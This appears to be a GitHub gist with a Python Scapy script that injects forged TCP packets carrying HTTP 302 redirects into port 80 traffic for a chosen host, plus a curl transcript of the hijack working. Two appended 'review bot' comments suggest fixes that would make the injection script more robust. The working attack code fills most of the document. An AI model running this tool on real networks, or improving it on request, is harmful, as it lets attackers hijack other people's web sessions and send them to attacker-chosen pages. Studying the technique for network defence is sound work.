Last active
December 14, 2022 13:02
inaz2 created this gist
Aug 8, 2016
@@ -0,0 +1,45 @@ $ sudo python tcp_http_spoof.py >&/dev/null & [1] 3477 $ curl -vL http://www.google.com/ * Hostname was NOT found in DNS cache * Trying 172.217.26.100... * Connected to www.google.com (172.217.26.100) port 80 (#0) > GET / HTTP/1.1 > User-Agent: curl/7.35.0 > Host: www.google.com > Accept: */* > < HTTP/1.1 302 Found < Location: http://www.example.com/ < Content-Length: 0 < Connection: close < * Closing connection 0 * Issue another request to this URL: 'http://www.example.com/' * Hostname was NOT found in DNS cache * Trying 93.184.216.34... * Connected to www.example.com (93.184.216.34) port 80 (#1) > GET / HTTP/1.1 > User-Agent: curl/7.35.0 > Host: www.example.com > Accept: */* > < HTTP/1.1 200 OK < Accept-Ranges: bytes < Cache-Control: max-age=604800 < Content-Type: text/html < Date: Mon, 08 Aug 2016 16:28:39 GMT < Etag: "359670651+gzip" < Expires: Mon, 15 Aug 2016 16:28:39 GMT < Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT * Server ECS (cpm/F9D5) is not blacklisted < Server: ECS (cpm/F9D5) < Vary: Accept-Encoding < X-Cache: HIT < x-ec-custom-error: 1 < Content-Length: 1270 < <!doctype html> (snip) * Connection #1 to host www.example.com left intact
@@ -0,0 +1,24 @@ from scapy.all import * class TCP_HTTP_am(AnsweringMachine): function_name="TCP_HTTP_spoof" filter = "tcp port 80" def parse_options(self, target_host="www.google.com", redirect_url='http://www.example.com/'): self.target_host = target_host self.redirect_url = redirect_url def is_request(self, req): return req.haslayer(Raw) and ("Host: %s" % self.target_host in req.getlayer(Raw).load) def make_reply(self, req): ip = req.getlayer(IP) tcp = req.getlayer(TCP) http_payload = "HTTP/1.1 302 Found\r\nLocation: %s\r\nContent-Length: 0\r\nConnection: close\r\n\r\n" % self.redirect_url resp = IP(dst=ip.src, src=ip.dst) / TCP(dport=ip.sport,sport=ip.dport, flags="PA", seq=tcp.ack, ack=tcp.seq+len(tcp.payload)) / Raw(load=http_payload) return resp if __name__ == '__main__': conf.L3socket = L3RawSocket TCP_HTTP_am()()
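Review bot: The usage transcript (the `@@ -0,0 +1,45 @@` hunk) never stops the background job it starts. The first command launches `tcp_http_spoof.py` under sudo as job `[1] 3477`, and the log ends at "Connection #1 ... left intact" with that root process still answering every request whose payload contains `Host: www.google.com`. Add a closing step that terminates the job (for example `sudo kill 3477`) so the documented procedure leaves the host clean. The `>&/dev/null` redirect also discards Scapy's stderr, so a failed start (missing module, no raw-socket permission) is invisible in the transcript; keeping stderr visible or sending it to a log file would make the run reproducible.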
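Review bot: `make_reply` in the script hunk (`@@ -0,0 +1,24 @@`) dereferences `req.getlayer(IP)` without a check, while `filter = "tcp port 80"` also admits IPv6 segments and `is_request` only tests for a `Raw` layer, so an IPv6 packet carrying the Host header leaves `ip` as None and raises on `ip.src`. Have `is_request` also require `req.haslayer(IP)` and `req.haslayer(TCP)`. Two smaller points in the same hunk: the ports are read as `ip.sport` / `ip.dport`, which works only because Scapy forwards unknown attributes to the payload layer, and `tcp.sport` / `tcp.dport` states what is meant; and the Host test is a substring match of a str against `Raw.load`, which matches anywhere in the payload (including `Host: www.google.com` followed by further characters) and raises TypeError on Python 3, where `load` is bytes. A short docstring on `parse_options` naming the two parameters and their defaults would cover the missing documentation.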